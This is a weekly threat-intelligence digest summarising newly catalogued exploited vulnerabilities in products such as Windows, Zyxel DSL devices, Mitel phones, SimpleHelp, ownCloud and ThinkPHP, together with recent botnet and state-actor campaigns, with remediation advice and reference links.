This week, the CISA Known Exploited Vulnerabilities (KEV) catalog expanded with eight new additions, including two Microsoft zero-days, two End-of-Life vulnerabilities in Zyxel devices, and one each affecting Apple, SimpleHelp, and Mitel SIP phones. Beyond these, GreyNoise detected a surge in exploitation activity targeting ThinkPHP and ownCloud vulnerabilities, one already flagged as a top government concern, while the other remains overlooked despite escalating real-world attacks.  

Meanwhile, botnets continue to pose a significant threat, with EnemyBot and Sysrv-K exploiting weaknesses in Spring Cloud Gateway, while Mozi, Andr0xgh0st, Tsunami, Spytech Necro, and Sysrv intensify attacks on Atlassian products.

Additionally, Symantec uncovered an RA World ransomware attack leveraging a flaw in Palo Alto Networks PAN-OS, Microsoft detailed Seashell Blizzard’s BadPilot campaign targeting multiple vendors, and Recorded Future’s Insikt Group identified an active campaign exploiting unpatched Cisco network devices.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-0994

The Deserialization of Untrusted Data Vulnerability in Trimble Cityworks has been actively exploited, enabling attackers to execute remote code on affected systems. With a high CVSS Score of 8.6, this flaw impacts Cityworks versions prior to 15.8.9 and Cityworks with Office Companion versions prior to 23.10. Though the technical exploitation details remained undisclosed, Trimble has identified WinPutty and Cobalt Strike beacons among the tools used by threat actors to gain persistence and control over compromised networks. Given its active exploitation, this vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, urging organizations to prioritize remediation efforts.

‍CVE-2025-21391

A Link Following Vulnerability in the Microsoft Windows Storage has been actively exploited as zero-day, enabling attackers to gain elevated system privileges. With a high CVSS of 7.1, this vulnerability could enable adversaries to delete specific files, potentially affecting critical system operations. While the flaw does not directly expose sensitive information, it could impact system availability. Microsoft has released a security update to address this issue, and due to active exploitation, it has been added to the CISA KEV catalog, underscoring the importance of timely patching.

‍CVE-2025-21418

A Heap-Based Buffer Overflow Vulnerability in the Microsoft Windows Ancillary Function Driver (AFD.sys) for WinSock poses a serious risk to system security. With a high CVSS Score of 7.8, this vulnerability affects AFD.sys, a crucial driver that enables network communication through the Windows Sockets API. While Microsoft has released a security update to address this issue, no details have been disclosed on how the vulnerability has been exploited in real-world attacks. Given the potential for abuse, it has been included in the CISA KEV catalog, urging organizations to apply patches swiftly.

CVE-2025-24200

An Improper Authorization Vulnerability affecting Apple iPadOS and iOS has been discovered, leading Apple to issue an emergency security update to mitigate the risk. This flaw enables attackers to bypass USB Restricted Mode on locked devices, allowing attackers with physical access to restore data transfer and further compromise the device. This vulnerability has been added to the CISA KEV catalog, urging users to update their devices promptly.  

‍CVE-2024-40890

An OS Command Injection Vulnerability has been identified in the Zyxel DSL CPE series, with a high CVSS Score of 8.8. This post-authentication flaw allows an attacker with valid credentials to send a specially crafted HTTP Post request to the CGI Program, enabling the execution of arbitrary OS commands on the affected devices. Zyxel has confirmed that the affected models have reached End-of-Life and will not receive any patches or security updates, leaving them permanently vulnerable. Given its exploitation in the wild, this vulnerability has been added to the CISA KEV catalog, highlighting the need for immediate mitigation through device replacement.  

‍CVE-2024-40891

An OS Command Injection Vulnerability in the Zyxel DSL CPE series, with a high CVSS Score of 8.8. This post-authentication vulnerability exists in the management commands component, enabling an authenticated attacker to execute arbitrary OS commands via Telnet. Zyxel has confirmed that the affected products have officially reached End-of-Life and will not receive patches or security updates, leaving them permanently vulnerable.  GreyNoise has detected a significant overlap in IP activity between attackers exploiting this flaw and previously observed Mirai botnet operations, confirming that certain Mirai variants have integrated this exploit into their attack toolkit.   Given its ongoing use in real-world attacks, it has been added to the CISA KEV catalog, highlighting the urgency for organizations to replace vulnerable devices as soon as possible.

‍CVE-2024-41710

A Command Injection Vulnerability affecting Mitel 6800, 6900, and 6900w series SIP phones, including the 6970 Conference Unit, could allow attackers to execute arbitrary commands within the phone’s environment. The flaw originates from improper sanitization of user-supplied input, as demonstrated in a proof-of-concept (PoC) exploit released by Kyle Burns of PacketLabs in August 2024. According to Akamai report, the first known exploitation attempts surfaced in January 2025, approximately six months after disclosure. The vulnerability is now under active exploitation, with attackers leveraging it to gain control over vulnerable devices. Due to its severity, it has been added to the CISA KEV catalog, prompting organizations to take immediate mitigation measures.  

‍CVE-2024-57727

An Unauthenticated Path Traversal Vulnerability in SimpleHelp Remote Monitoring and Management (RMM) software allows unauthenticated attackers to download arbitrary files from the SimpleHelp host using HTTP requests. These files may include server configuration files and hashed user passwords, increasing the risk of unauthorized access. With a high CVSS Score of 7.5, this vulnerability has been added to the CISA KEV catalog.

‍CVE-2023-49103

A Sensitive Information Disclosure Vulnerability in ownCloud GraphAPI, added to the CISA Known Exploited Vulnerabilities (KEV) catalog in November 2023, continues to be actively targeted. GreyNoise recently detected 484 unique IPs attempting exploitation, with confirmed threat actor activity. To mitigate the risk, users should upgrade to ownCloud GraphAPI version 0.3.1 or later.  

CVE-2022-47945

A Path Traversal Vulnerability in the ThinkPHP Framework could lead to arbitrary code execution, posing a critical security risk with a CVSS score of 9.8.  GreyNoise has observed a surge in exploitation attempts, with 572 unique IPs actively targeting this flaw, and attack activity increasing in recent days. Past campaigns have shown Chinese threat actors exploiting ThinkPHP vulnerabilities, making this a high-risk issue. Upgrading to ThinkPHP version 6.0.14 or later is recommended to mitigate potential threats.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2024-0012

Symantec's Threat Hunter Team, has uncovered an RA World Ransomware attack from November 2024, targeting an unnamed Asian software and services company. Notably, the attacker deployed a malicious toolset previously linked to China-based cyber espionage groups, suggesting the possibility of a threat actor moonlighting as ransomware operator. While the exact initial access method remains unclear, the attacker claimed to have exploited a known vulnerability in Palo Alto Networks PAN-OS.

The BadPilot Campaign

Microsoft has unveiled new research on a subgroup within the Russian state actor Seashell Blizzard, detailing its long-running BadPilot campaign. Active since at least 2021, this subgroup has systematically compromised Internet-facing infrastructure worldwide to establish persistence on high-value targets and enable tailored network operations. By exploiting known vulnerabilities in network perimeters of small office/home office and enterprise network perimeters, the attackers have used stealthy persistence techniques to harvest credentials, execute commands, and move laterally, resulting in significant regional network compromises.  

‍CVE-2023-20198 and CVE-2023-20273

Recorded Future’s Insikt Group has identified a campaign between December 2024 and January 2025 that exploited unpatched, internet-facing Cisco network devices, primarily impacting global telecommunications providers. Victims included a U.S.-based affiliate of a U.K. telecommunications firm and a South African telecom provider. The activity has been attributed to the Chinese state-sponsored group "RedMike", which aligns with Microsoft-named group “Salt Typhoon”.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/02/12/cisa-adds-two-known-exploited-vulnerabilities-catalog
2. ‍https://www.cisa.gov/news-events/alerts/2025/02/11/cisa-adds-four-known-exploited-vulnerabilities-catalog
3. https://www.cisa.gov/news-events/alerts/2025/02/07/cisa-adds-one-known-exploited-vulnerability-catalog
4. https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/
5. https://support.apple.com/en-us/122174  
6. https://www.zerodayinitiative.com/blog/2025/2/11/the-february-2025-security-update-review  
7. https://www.security.com/threat-intelligence/chinese-espionage-ransomware  
8. https://www.recordedfuture.com/research/redmike-salt-typhoon-exploits-vulnerable-devices  
9. https://www.greynoise.io/blog/new-exploitation-surge-attackers-target-thinkphp-and-owncloud-flaws-at-scale
10. https://www.cisa.gov/news-events/alerts/2025/02/13/cisa-adds-one-known-exploited-vulnerability-catalog